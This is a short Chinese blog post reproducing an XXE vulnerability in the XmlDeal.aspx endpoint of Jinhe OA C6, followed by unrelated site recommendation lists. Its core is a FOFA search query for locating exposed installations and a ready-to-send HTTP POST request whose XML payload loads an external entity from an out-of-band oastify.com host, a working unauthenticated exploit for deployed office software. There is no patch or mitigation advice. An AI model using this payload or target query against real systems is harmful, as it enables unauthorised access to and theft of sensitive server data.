【漏洞复现】金和OA XmlDeal.aspx XXE漏洞

0x01 产品简介

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

0x02 漏洞概述

金和OA-C6-XmlDeal.aspx接口存在XML实体注入漏洞,未授权的攻击者可通过该漏洞获取服务器敏感数据。

0x03 测绘语句

fofa: app="金和网络-金和OA"

0x04 漏洞复现

​
使用burp自带的dnslog

POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1

Host:

Content-Type: application/Xml

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://zdgenbqwmvts71ozygb7fowluc03otci.oastify.com/"> %remote;]>'

​

相关推荐

  1. 漏洞现】金OA XmlDeal.aspx XXE漏洞

    2024-04-02 11:04:03       37 阅读
  2. thinkphp漏洞

    2024-04-02 11:04:03       33 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-02 11:04:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-02 11:04:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-02 11:04:03       82 阅读
  4. Python语言-面向对象

    2024-04-02 11:04:03       91 阅读

热门阅读

  1. 探索Django:打造高效、可扩展的Web应用(上)

    2024-04-02 11:04:03       41 阅读
  2. 新手基于axios 的二次封装

    2024-04-02 11:04:03       46 阅读
  3. linux期末知识点总结

    2024-04-02 11:04:03       38 阅读